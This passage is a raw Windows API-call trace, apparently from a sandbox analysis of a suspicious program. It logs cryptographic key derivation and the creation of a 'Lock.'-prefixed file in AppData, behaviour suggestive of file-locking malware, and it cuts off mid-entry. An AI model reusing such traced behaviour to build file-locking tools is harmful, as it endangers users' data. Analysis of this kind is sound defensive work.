[0154.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0154.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaad50, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0154.023] CryptHashData (hHash=0x9e1fb8, pbData=0x2a72778, dwDataLen=0x3, dwFlags=0x1) returned 1 [0154.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.023] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.023] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.023] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.023] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0154.023] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.023] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0154.024] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.024] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0154.024] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0154.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aaade0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0154.024] CryptDeriveKey (in: hProv=0x9beab0, Algid=0x6601, hBaseData=0x9e1fb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0154.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.024] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.024] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0154.024] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0154.024] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0154.024] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0154.024] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0154.024] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0154.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0154.024] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f70a0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0154.024] CryptDestroyHash (hHash=0x9e1fb8) returned 1 [0154.025] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0154.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.025] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.026] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Application Data" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\application data"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0154.026] GetLastError () returned 0x5 [0154.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0154.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0154.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0154.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0154.026] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0154.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0154.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0154.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0154.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0154.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0154.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0154.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0154.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0154.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8b8 | out: hHeap=0x2af0000) returned 1 [0154.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0154.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0154.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0154.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0154.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0154.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a684c8 [0154.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0154.032] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/" (normalized: "c:\\users\\fd1hvy\\appdata\\local")) returned 0x10 [0154.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684c8 | out: hHeap=0x2af0000) returned 1 [0154.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0154.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0154.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0154.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0154.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0154.033] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Local/Lock.Application Data" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\lock.application data"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4dc [0154.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0154.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec80 [0154.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec80 | out: hHeap=0x2af0000) returned 1 [0154.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0154.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0154.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0154.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fa0 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fa0 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0154.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0154.035] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72258 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0154.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0154.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0154.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0154.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0154.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0154.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0154.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0154.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0154.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0154.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0154.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0154.036] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72348 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0154.036] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0154.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0154.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72398 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0154.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0154.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721b8 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0154.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721d8 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0154.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721f8 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0154.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaab10 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0154.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0154.037] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0154.037] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0154.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0154.038] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0154.038] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: 